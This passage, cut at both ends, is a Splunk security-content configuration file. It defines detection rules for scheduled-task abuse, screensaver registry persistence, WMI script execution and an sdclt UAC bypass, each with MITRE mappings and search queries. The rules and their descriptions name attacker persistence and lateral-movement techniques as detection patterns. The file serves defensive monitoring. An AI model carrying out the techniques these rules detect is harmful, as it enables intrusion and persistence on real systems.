Ransomware incident. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic focuses on identifying the creation or deletion of scheduled tasks using the schtasks.exe utility with the corresponding command-line flags (-create or -delete). This technique has been notably associated with threat actors like Dragonfly and the SUNBURST attack against SolarWinds. The purpose of this analytic is to detect suspicious activity related to scheduled tasks that could indicate malicious intent or unauthorized system manipulation. By monitoring for these specific command-line flags, we can enhance our ability to identify potential threats and prevent attacks similar to the use of scheduled tasks in the BadRabbit Ransomware incident. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = While it is possible for legitimate scripts or administrators to trigger this behavior, filtering can be applied based on the parent process and application to reduce false positives. Analysts should reference the provided references to understand the context and threat landscape associated with this activity. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Scheduled Task Deleted Or Created via CMD - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AsyncRAT", "Winter Vivern", "Windows Persistence Techniques", "Living Off The Land", "Prestige Ransomware", "AgentTesla", "NjRAT", "RedLine Stealer", "Rhysida Ransomware", "Azorult", "DHS Report TA18-074A", "Scheduled Tasks", "Sandworm Tools", "Qakbot", "CISA AA22-257A", "Trickbot", "NOBELIUM Group", "Amadey", "DarkCrystal RAT", "CISA AA23-347A", "Phemedrone Stealer"] action.risk = 1 action.risk.param._risk_message = A schedule task process $process_name$ with create or delete commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Scheduled Task Deleted Or Created via CMD - Rule action.correlationsearch.annotations = {"analytic_story": ["AsyncRAT", "Winter Vivern", "Windows Persistence Techniques", "Living Off The Land", "Prestige Ransomware", "AgentTesla", "NjRAT", "RedLine Stealer", "Rhysida Ransomware", "Azorult", "DHS Report TA18-074A", "Scheduled Tasks", "Sandworm Tools", "Qakbot", "CISA AA22-257A", "Trickbot", "NOBELIUM Group", "Amadey", "DarkCrystal RAT", "CISA AA23-347A", "Phemedrone Stealer"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic focuses on identifying the creation or deletion of scheduled tasks using the schtasks.exe utility with the corresponding command-line flags (-create or -delete). This technique has been notably associated with threat actors like Dragonfly and the SUNBURST attack against SolarWinds. The purpose of this analytic is to detect suspicious activity related to scheduled tasks that could indicate malicious intent or unauthorized system manipulation. By monitoring for these specific command-line flags, we can enhance our ability to identify potential threats and prevent attacks similar to the use of scheduled tasks in the BadRabbit Ransomware incident. action.notable.param.rule_title = Scheduled Task Deleted Or Created via CMD action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe (Processes.process=*delete* OR Processes.process=*create*) by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `scheduled_task_deleted_or_created_via_cmd_filter` [ESCU - Scheduled Task Initiation on Remote Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects instances of 'schtasks.exe' being used to start a Scheduled Task on a remote endpoint. Adversaries often abuse the Task Scheduler for lateral movement and remote code execution. The search parameters include process details such as the process name, parent process, and command-line executions. Although legitimate administrators may start scheduled tasks on remote systems, this activity is usually limited to a small set of hosts or users. The findings from this analytic provide valuable insight into potentially malicious activities on an endpoint. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects instances of 'schtasks.exe' being used to start a Scheduled Task on a remote endpoint. Adversaries often abuse the Task Scheduler for lateral movement and remote code execution. The search parameters include process details such as the process name, parent process, and command-line executions. Although legitimate administrators may start scheduled tasks on remote systems, this activity is usually limited to a small set of hosts or users. The findings from this analytic provide valuable insight into potentially malicious activities on an endpoint. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may start scheduled tasks on remote systems, but this activity is usually limited to a small set of hosts or users. action.escu.creation_date = 2021-11-11 action.escu.modification_date = 2021-11-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Scheduled Task Initiation on Remote Endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A Windows Scheduled Task was ran on a remote endpoint from $dest action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Scheduled Task Initiation on Remote Endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects instances of 'schtasks.exe' being used to start a Scheduled Task on a remote endpoint. Adversaries often abuse the Task Scheduler for lateral movement and remote code execution. The search parameters include process details such as the process name, parent process, and command-line executions. Although legitimate administrators may start scheduled tasks on remote systems, this activity is usually limited to a small set of hosts or users. The findings from this analytic provide valuable insight into potentially malicious activities on an endpoint. action.notable.param.rule_title = Scheduled Task Initiation on Remote Endpoint action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=schtasks.exe OR Processes.original_file_name=schtasks.exe) (Processes.process=*/s* AND Processes.process=*/run*) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `scheduled_task_initiation_on_remote_endpoint_filter` [ESCU - Schtasks Run Task On Demand - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is designed to detect when a Windows Scheduled Task is executed on demand via shell or command line. Adversaries often force the execution of their created Scheduled Tasks for persistent access or lateral movement within a compromised machine. This analytic is driven by process-related data, specifically process name, parent process, and command-line executions, sourced from endpoint logs. The search criteria focus on 'schtasks.exe' with an associated 'run' command. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is designed to detect when a Windows Scheduled Task is executed on demand via shell or command line. Adversaries often force the execution of their created Scheduled Tasks for persistent access or lateral movement within a compromised machine. This analytic is driven by process-related data, specifically process name, parent process, and command-line executions, sourced from endpoint logs. The search criteria focus on 'schtasks.exe' with an associated 'run' command. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Bear in mind, administrators debugging Scheduled Task entries may trigger this analytic, necessitating fine-tuning and filtering to distinguish between legitimate and potentially malicious use of 'schtasks.exe'. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Schtasks Run Task On Demand - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Qakbot", "Industroyer2", "XMRig", "CISA AA22-257A", "Data Destruction", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A "on demand" execution of schedule task process $process_name$ using commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 48}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Schtasks Run Task On Demand - Rule action.correlationsearch.annotations = {"analytic_story": ["Qakbot", "Industroyer2", "XMRig", "CISA AA22-257A", "Data Destruction", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is designed to detect when a Windows Scheduled Task is executed on demand via shell or command line. Adversaries often force the execution of their created Scheduled Tasks for persistent access or lateral movement within a compromised machine. This analytic is driven by process-related data, specifically process name, parent process, and command-line executions, sourced from endpoint logs. The search criteria focus on 'schtasks.exe' with an associated 'run' command. action.notable.param.rule_title = Schtasks Run Task On Demand action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "schtasks.exe" Processes.process = "*/run*" by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `schtasks_run_task_on_demand_filter` [ESCU - Schtasks scheduling job on remote system - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is designed to detect suspicious command-line arguments executed through 'schtasks.exe' to create a scheduled task on a remote endpoint. The analytic scans process data, checking for instances where 'schtasks.exe' has been used with specific command-line flags that suggest an attempt at lateral movement or remote code execution, common techniques employed by adversaries and red teams. Key data points include the process name, the specific command line used, the parent process name, the target destination, and the user involved. Also, timestamp data gives context to when these activities occurred. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is designed to detect suspicious command-line arguments executed through 'schtasks.exe' to create a scheduled task on a remote endpoint. The analytic scans process data, checking for instances where 'schtasks.exe' has been used with specific command-line flags that suggest an attempt at lateral movement or remote code execution, common techniques employed by adversaries and red teams. Key data points include the process name, the specific command line used, the parent process name, the target destination, and the user involved. Also, timestamp data gives context to when these activities occurred. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = While it is possible to have false positives, due to legitimate administrative tasks, these are usually limited and should still be validated and investigated as appropriate. action.escu.creation_date = 2022-05-23 action.escu.modification_date = 2022-05-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Schtasks scheduling job on remote system - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement", "NOBELIUM Group", "Living Off The Land", "Prestige Ransomware", "Scheduled Tasks", "RedLine Stealer", "Phemedrone Stealer"] action.risk = 1 action.risk.param._risk_message = A schedule task process $process_name$ with remote job command-line $process$ in host $dest$ by $user$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Schtasks scheduling job on remote system - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "NOBELIUM Group", "Living Off The Land", "Prestige Ransomware", "Scheduled Tasks", "RedLine Stealer", "Phemedrone Stealer"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is designed to detect suspicious command-line arguments executed through 'schtasks.exe' to create a scheduled task on a remote endpoint. The analytic scans process data, checking for instances where 'schtasks.exe' has been used with specific command-line flags that suggest an attempt at lateral movement or remote code execution, common techniques employed by adversaries and red teams. Key data points include the process name, the specific command line used, the parent process name, the target destination, and the user involved. Also, timestamp data gives context to when these activities occurred. action.notable.param.rule_title = Schtasks scheduling job on remote system action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = schtasks.exe OR Processes.original_file_name=schtasks.exe) (Processes.process="*/create*" AND Processes.process="*/s*") by Processes.process_name Processes.process Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `schtasks_scheduling_job_on_remote_system_filter` [ESCU - Schtasks used for forcing a reboot - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes a Splunk query to pinpoint potential threats by monitoring the 'schtasks.exe' command-line usage. This particular command, especially when used in tandem with 'shutdown' and '/create' flags, can suggest an adversarial force intending to schedule unwarranted system reboots. The query focuses on endpoint process data and retrieves details such as the process name, the parent process name, the destination, and the user involved. Essential to the investigation are the earliest and latest timestamps of these events, providing an activity timeline. Data such as the targeted host and initiating user offer valuable context for analyst. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic utilizes a Splunk query to pinpoint potential threats by monitoring the 'schtasks.exe' command-line usage. This particular command, especially when used in tandem with 'shutdown' and '/create' flags, can suggest an adversarial force intending to schedule unwarranted system reboots. The query focuses on endpoint process data and retrieves details such as the process name, the parent process name, the destination, and the user involved. Essential to the investigation are the earliest and latest timestamps of these events, providing an activity timeline. Data such as the targeted host and initiating user offer valuable context for analyst. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = This analytic may also capture legitimate administrative activities such as system updates or maintenance tasks, which can be classified as false positives. Filter as needed. action.escu.creation_date = 2020-12-07 action.escu.modification_date = 2020-12-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Schtasks used for forcing a reboot - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Persistence Techniques", "Ransomware", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = A schedule task process $process_name$ with force reboot commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Schtasks used for forcing a reboot - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Persistence Techniques", "Ransomware", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005", "T1053"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes a Splunk query to pinpoint potential threats by monitoring the 'schtasks.exe' command-line usage. This particular command, especially when used in tandem with 'shutdown' and '/create' flags, can suggest an adversarial force intending to schedule unwarranted system reboots. The query focuses on endpoint process data and retrieves details such as the process name, the parent process name, the destination, and the user involved. Essential to the investigation are the earliest and latest timestamps of these events, providing an activity timeline. Data such as the targeted host and initiating user offer valuable context for analyst. action.notable.param.rule_title = Schtasks used for forcing a reboot action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe Processes.process="*shutdown*" Processes.process="*/create *" by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `schtasks_used_for_forcing_a_reboot_filter` [ESCU - Screensaver Event Trigger Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is developed to detect possible event trigger execution through screensaver registry entry modification for persistence or privilege escalation. This technique was seen in several APT and malware where they put the malicious payload path to the SCRNSAVE.EXE registry key to redirect the execution to their malicious payload path. This TTP is a good indicator that some attacker may modify this entry for their persistence and privilege escalation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546", "T1546.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is developed to detect possible event trigger execution through screensaver registry entry modification for persistence or privilege escalation. This technique was seen in several APT and malware where they put the malicious payload path to the SCRNSAVE.EXE registry key to redirect the execution to their malicious payload path. This TTP is a good indicator that some attacker may modify this entry for their persistence and privilege escalation. action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via endpoint detection-and-response product, such as Carbon Black or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Screensaver Event Trigger Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Hermetic Wiper", "Windows Privilege Escalation", "Windows Persistence Techniques", "Windows Registry Abuse", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = modified/added/deleted registry entry $Registry.registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Screensaver Event Trigger Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Windows Privilege Escalation", "Windows Persistence Techniques", "Windows Registry Abuse", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546", "T1546.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is developed to detect possible event trigger execution through screensaver registry entry modification for persistence or privilege escalation. This technique was seen in several APT and malware where they put the malicious payload path to the SCRNSAVE.EXE registry key to redirect the execution to their malicious payload path. This TTP is a good indicator that some attacker may modify this entry for their persistence and privilege escalation. action.notable.param.rule_title = Screensaver Event Trigger Execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path="*\\Control Panel\\Desktop\\SCRNSAVE.EXE*") by Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `screensaver_event_trigger_execution_filter` [ESCU - Script Execution via WMI - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects any potential misuse of Windows Management Instrumentation (WMI) for malicious purposes since adversaries often use WMI to run scripts which allows them to carry out malicious activities without raising suspicion. The detection is made by monitoring the process 'scrcons.exe', which is essential to run WMI scripts. The detection is important because it proactively identifies and responds to potential threats that leverage WMI for malicious purposes that can lead to system compromise, data exfiltration, or the establishment of persistence within the environment. False positives might occur since administrators might occasionally use WMI to launch scripts for legitimate purposes. Therefore, you must distinguish between malicious and benign activities. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects any potential misuse of Windows Management Instrumentation (WMI) for malicious purposes since adversaries often use WMI to run scripts which allows them to carry out malicious activities without raising suspicion. The detection is made by monitoring the process 'scrcons.exe', which is essential to run WMI scripts. The detection is important because it proactively identifies and responds to potential threats that leverage WMI for malicious purposes that can lead to system compromise, data exfiltration, or the establishment of persistence within the environment. False positives might occur since administrators might occasionally use WMI to launch scripts for legitimate purposes. Therefore, you must distinguish between malicious and benign activities. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, administrators may use wmi to launch scripts for legitimate purposes. Filter as needed. action.escu.creation_date = 2020-03-16 action.escu.modification_date = 2020-03-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Script Execution via WMI - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious WMI Use"] action.risk = 1 action.risk.param._risk_message = A wmic.exe process $process_name$ that execute script in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Script Execution via WMI - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious WMI Use"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects any potential misuse of Windows Management Instrumentation (WMI) for malicious purposes since adversaries often use WMI to run scripts which allows them to carry out malicious activities without raising suspicion. The detection is made by monitoring the process 'scrcons.exe', which is essential to run WMI scripts. The detection is important because it proactively identifies and responds to potential threats that leverage WMI for malicious purposes that can lead to system compromise, data exfiltration, or the establishment of persistence within the environment. False positives might occur since administrators might occasionally use WMI to launch scripts for legitimate purposes. Therefore, you must distinguish between malicious and benign activities. action.notable.param.rule_title = Script Execution via WMI action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=scrcons.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `script_execution_via_wmi_filter` [ESCU - Sdclt UAC Bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious sdclt.exe registry modification. This technique is commonly seen when attacker try to bypassed UAC by using sdclt.exe application by modifying some registry that sdclt.exe tries to open or query with payload file path on it to be executed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious sdclt.exe registry modification. This technique is commonly seen when attacker try to bypassed UAC by using sdclt.exe application by modifying some registry that sdclt.exe tries to open or query with payload file path on it to be executed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited to no false positives are expected. action.escu.creation_date = 2022-11-14 action.escu.modification_date = 2022-11-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Sdclt UAC Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Suspicious modification of registry $registry_path$ with possible 